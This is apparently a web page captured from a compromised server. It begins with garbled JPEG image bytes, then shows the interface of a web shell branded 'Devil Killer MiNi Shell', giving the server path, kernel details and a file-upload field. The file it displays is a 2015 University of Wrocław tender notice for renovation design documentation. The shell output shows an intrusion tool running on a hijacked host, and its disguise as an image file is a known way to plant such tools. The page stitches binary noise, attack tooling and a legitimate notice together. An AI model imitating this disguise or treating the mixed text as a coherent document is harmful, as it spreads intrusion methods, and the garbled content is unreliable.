JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150507/65341-N-2015.html

<p class="kh_header"><b>Wrocław: Wykonanie dokumentacji projektowo-kosztorysowej na remont budynków Uniwersytetu Wrocławskiego. 3 Zadania</b><br>
<b>Numer ogłoszenia: 65341 - 2015; data zamieszczenia: 07.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej na remont budynków Uniwersytetu Wrocławskiego. 3 Zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa wykonania dokumentacji projektowo-kosztorysowej na remont budynków Uniwersytetu Wrocławskiego realizowana w 3 zadaniach.
Zadanie 1: Wykonanie dokumentacji projektowo-kosztorysowej na remont pomieszczeń piwnicznych budynku Uniwersytetu Wrocławskiego przy ul. Krętej 1 we Wrocławiu (wymiana zawilgoconych i odparzonych tynków, wykonanie izolacji przeciwwilgociowej ścian fundamentowych).
Zadanie 2: Wykonanie dokumentacji projektowo-kosztorysowej na remont elewacji oraz piwnic w celu usunięcia zawilgocenia w budynku Uniwersytetu Wrocławskiego przy ul. Szewskiej 48 we Wrocławiu.
Zadanie 3: Wykonanie dokumentacji projektowo - kosztorysowej na remont dachu, elewacji i wymiany stolarki okiennej w budynku Uniwersytetu Wrocławskiego przy ul. Przybyszewskiego 63/77 we Wrocławiu.

2.	W ramach Zadania 1 należy:
a)	Zinwentaryzować piwnice i parter
b)	Zlecić opinię kominiarską celem określenia drożności kanałów wentylacyjnych
c)	Dostosować piwnicę i parter do wszystkich uwag zawartych w ekspertyzie mykologiczno - budowlanej z marca 2015r. wykonanej przez mgr inż. Jana Kunerta 
d)	Uzyskać uzgodnienie z rzeczoznawcą ds. ppoż. i sanepidu
e)	Uzyskać pozwolenie na budowę

3.	W ramach Zadania 2 należy:
a)	Uściślić inwentaryzację 
b)	Wykonać ekspertyzę mykologiczno-budowlaną dla piwnic 
c)	Wymienić lub przewidzieć renowację stolarki okiennej i drzwiowej zewnętrznej w całym budynku wraz z obróbkami wewnętrznymi i zewnętrznymi oraz w razie potrzeby podokienników wewnętrznych i zewnętrznych; zastosować  nawietrzaki w oknach. Wymianę okien powiązać z dostosowaniem budynku do aktualnych przepisów ppoż. (instalacja oddymiająca okien). 
d)	Wyremontować ściany osłonowe zewnętrzne i od strony dziedzińca - ze względu na zły stan tynków; wykonać nowe tynki. Zastosować farby antygraffiti.
e)	Odtworzyć detale dekoracyjne na elewacjach jak opaski, obdasznice okien, balustradę balkonową, gzymsy boniowane, portal, opaski okienne itp.
f)	Poddać renowacji zabytkowe kraty
g)	Wymienić obróbki blacharskie w tym rynny, rury spustowe, daszki i opierzenia.
h)	Zdemontować i powtórnie zamontować instalację odgromową, anteny i lampy oświetlenia ulicznego.
i)	W piwnicach należy: skuć stare tynki i zastąpić je tynkami renowacyjnymi, wypoziomować posadzkę w jednej z piwnic od ul. Szewskiej, przewidzieć izolację przeciwwilgociową pionową i poziomą, przewidzieć wymianę warstw posadzek piwnicznych i rozwiązanie problemu podmakania w piwnicach. Piwnice odgrzybić. Na podłogach w piwnicy położyć płytki gresowe. 
j)	Sprawdzić stan podejść i w zależności od ich stanu dokonać Ew. wymiany
k)	Przebudować studzienki okienne okien piwnicznych w taki sposób, żeby uniemożliwić przedostawanie się wód opadowych do wnętrza pomieszczeń piwnicznych 
l)	Dostosować piwnicę do wszystkich uwag zawartych w ekspertyzie mykologiczno - budowlanej.
m)	Z dokumentacji wykonanej w 2008 roku dotyczącej wentylacji i klimatyzacji w budynku wykonanej przez Pana Ryszarda Dąbrowskiego z firmy DORBUD  wybrać  część odnoszącą się do wentylacji piwnic. Uaktualnić kosztorys dla tej części dokumentacji. Przewidzieć demontaż starych nieużywanych kanałów wentylacyjnych znajdujących się aktualnie w piwnicach.
n)	W kosztorysach przewidzieć etapowanie inwestycji na elewację, okna i piwnicę.

4.	W ramach Zadania 3 należy:
a)	Uściślić inwentaryzację elewacji, okien, dachu i więźby dachowej
b)	Wykonać ekspertyzę kominiarską
c)	Wyremontować dach, kominy. uszkodzone kominki wentylacyjne i wywiewki instalacji kanalizacyjnej. Usunąć nieczynne kominki wentylacyjne. Dachówki ceramiczne, nowa papa na stropodachach. 
d)	Zdemontować stare lukarny na dachu i wykonać nowe. 
e)	Sprawdzić więźbę i ewentualnie uzupełnić łaty. Całość zaimpregnować ppoż. Wymienić uszkodzone deski podłogowe na strychu.
f)	Wymienić i zabezpieczyć ocieplenie nad starą aulą.
g)	Zdemontować stare rury na strychu i dachu
h)	W pomieszczeniach 311 i 316 sprawdzić możliwość wykorzystania w przyszłości istniejącego kanału wentylacji grawitacyjnej do podłączenia wyciągu z digestorium chemicznego. W razie braku takiej możliwości zaprojektować rury wyciągowe wyprowadzone ponad dach.
i)	Wyremontować balkony, schody zewnętrzne
j)	Wyremontować barierki i murki przy zejściach do piwnicy oraz barierki tarasów i balkonów. Całość ujednolicić.
k)	Wyremontować daszki dobudowane do budynku
l)	Wymienić lub przewidzieć renowację stolarki okiennej (w tym liczne okna nietypowe) i drzwiowej wraz z obróbkami wewnętrznymi i zewnętrznymi oraz w razie potrzeby podokienników wewnętrznych i zewnętrznych; zastosować  przewietrzaki w oknach. Wymianę okien powiązać z dostosowania budynku do aktualnych przepisów ppoż. (instalacja oddymiająca okien). Część okien już została wymieniona. Wymianę okien w sali wspinaczkowej uzgodnić z aktualnym użytkownikiem sali.
m)	Okna w piwnicach i na parterze zaopatrzyć w ujednolicone kraty
n)	Wyremontować ściany osłonowe zewnętrzne ze względu na zły stan tynków Wykonać nowe tynki i pomalować je farbami antygraffiti. Odnoga północna (tzw. budynek Arcusa) posiada już nowe tynki.
o)	Wymienić obróbki blacharskie w tym rynny i rury spustowe, obróbki przy kominach i na dachach.
p)	Uzupełnić opaski betonowe i żwirowe wokół budynku
q)	Przewidzieć demontaż i powtórny montaż instalacji odgromowej (lub zaprojektować nową) oraz telewizji dozorowej, rusztowań dla winorośli, klimatyzacji w oknach i na elewacji
r)	Pochować kable biegnące po elewacji
s)	Zabezpieczyć elewacje przed ptakami
t)	Przewidzieć etapowanie kosztorysów na dach, elewację i stolarkę

5. Szczegółowy zakres wykonania zamówienia oraz warunki i zasady realizacji umowy dla poszczególnych Zadań zawierają następujące dokumenty:
a)	Opis przedmiotu zamówienia dla Zadanie 1, 2 i 3 - Załączniki nr 2.1, 2.2 i 2.3 do SIWZ
b)	Wzory umów dla Zadanie 1, 2 i 3 - załączniki nr 9.1, 9.2 i 9.3 do SIWZ
c)	Rysunki stanu technicznego obiektów dla zadań 1, 2 i 3 - załącznik nr 10
d)	Ekspertyza mykologiczno-budowlana dla zadania 1 - załącznik nr 11
e)	Plan sytuacyjny dla zadania 2 - załącznik nr 12
f)	Plan sytuacyjny dla zadania 3 - załącznik nr 13.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez Wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zadanie 1:
Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej jedną dokumentację projektową obejmującą co najmniej remont izolacji przeciwwilgociowej budynku.

b)	Zadanie 2:
Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał, co najmniej jedną dokumentację projektową obejmującą remont elewacji obiektu o kubaturze nie mniejszej niż 10 000 m3 znajdującego się w ewidencji lub rejestrze zabytków.
c)	Zadanie 3:
Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał, co najmniej jedną dokumentację projektową obejmującą remont obiektu o kubaturze nie mniejszej niż 30 000 m3 znajdującego się w strefie ochrony konserwatorskiej 
Jedna usługa oznacza usługę wykonywaną w ramach jednej umowy.
Zamawiający zastrzega, że są to główne usługi jakie powinien wykazać Wykonawca. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy spełnia go co najmniej jeden podmiot lub podmioty spełniają go łącznie.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale III.4.1) Ogłoszenia.
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1, 2 i 3
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie  zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane (Dz. U. z 2013 r., poz. 1409) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub odpowiadające im, ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów lub którego odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych:
a)	Projektant posiadający uprawnienia budowlane do projektowania w specjalności architektonicznej 
b)	Projektant posiadający uprawnienia budowlane do projektowania w specjalności konstrukcyjna - budowlanej 
c)	Projektant posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci sanitarnych, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
d)	Projektant posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej co najmniej w zakresie  instalacji i urządzeń elektrycznych.
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale III.4.1) Ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zadanie 1:
Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej jedną dokumentację projektową obejmującą co najmniej remont izolacji przeciwwilgociowej budynku.

Zadanie 2:
Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał, co najmniej jedną dokumentację projektową obejmującą remont elewacji obiektu o kubaturze nie mniejszej niż 10 000 m3 znajdującego się w ewidencji lub rejestrze zabytków.
Zadanie 3:
Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał, co najmniej jedną dokumentację projektową obejmującą remont obiektu o kubaturze nie mniejszej niż 30 000 m3 znajdującego się w strefie ochrony konserwatorskiej;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty - Załącznik nr 1 do SIWZ;
2)	Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych - w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez notariusza.
3)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców, należy przedstawić pełnomocnictwo - w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia niniejszego zamówienia albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna wskazywać rodzaj uprawnień, do których upoważniony jest pełnomocnik.
4)	Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza).
5)	Z zobowiązania lub innych dokumentów potwierdzających udostępnienie zasobów przez inne podmioty musi bezspornie i jednoznacznie wynikać w szczególności: 
a) zakres dostępnych wykonawcy zasobów innego podmiotu, 
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. 
6)	W przypadku złożenia wspólnej oferty przez kilka podmiotów, każdy z nich zobowiązany jest przedstawić dokumenty i oświadczenia wystawione na niego w celu wykazania braku podstaw do wykluczenia z postępowania, w tym dokumenty dotyczące przynależności do tej samej grupy kapitałowej. Pozostałe dokumenty i oświadczenia podmioty składają wspólnie tj. warunki w nich określone są spełnione, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Jako odrębne załączniki nr 9.1, 9.2 i 9.3 do SIWZ, Zamawiający zamieścił wzory umów, które określają warunki realizacji przedmiotowego zamówienia publicznego.
2. Zmiany umowne dopuszczalne są tylko w sytuacjach wyraźnie wskazanych we wzorach umów, w par. 8.
a) W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia, Zamawiający  może  odstąpić  od  umowy  w  terminie  do  30  dni od powzięcia wiadomości o tych okolicznościach. W przypadku, o którym mowa powyżej Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy (art. 145 ustawy Prawo zamówień publicznych).
b) Ze względów losowych dopuszcza się zmianę przedstawicieli stron posiadających wskazane w umowie kwalifikacje
c) W przypadku zmiany stawki podatku VAT, będzie ona dostosowana do obowiązujących przepisów przy zachowaniu zaoferowanej przez Wykonawcę wartości wynagrodzenia brutto.
d) W przypadku nie uzyskania (w ciągu 2 miesięcy) uzgodnienia programu prac konserwatorskich u Miejskiego Konserwatora Zabytków - termin umowy zostanie przesunięty o czas niezbędny dla uzyskania potrzebnych uzgodnień</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzp.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, Ip. pok. 100, 50-138 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2015 godzina 10:00, miejsce: Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, Ip. pok. 100, 50-138 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia: 
Zadanie 1: do 4 miesięcy od dnia podpisania umowy;
Zadanie 2: do 6 miesięcy od dnia podpisania umowy;
Zadanie 3: do 7 miesięcy od dnia podpisania umowy.
2. Zamawiający wykluczy z postępowania na podstawie art. 24 ust. 1 i 2 ustawy pzp wykonawców, którzy nie wykaże spełniania warunków udziału w postępowaniu oraz na podstawie art. 24 ust. 2a ustawy Pzp wykonawców w stosunku do, których zamawiający wykaże zaistnienie przesłanek wymienionych w niniejszym przepisie. 
3. Zamawiający nie przewiduje: zawarcia umowy ramowej, zastosowania dynamicznego systemu zakupów, zastosowania aukcji elektronicznej, udzielenia  zamówień uzupełniających, o których mowa w art. 67ust.1 pkt 7 ustawy Pzp.</p>
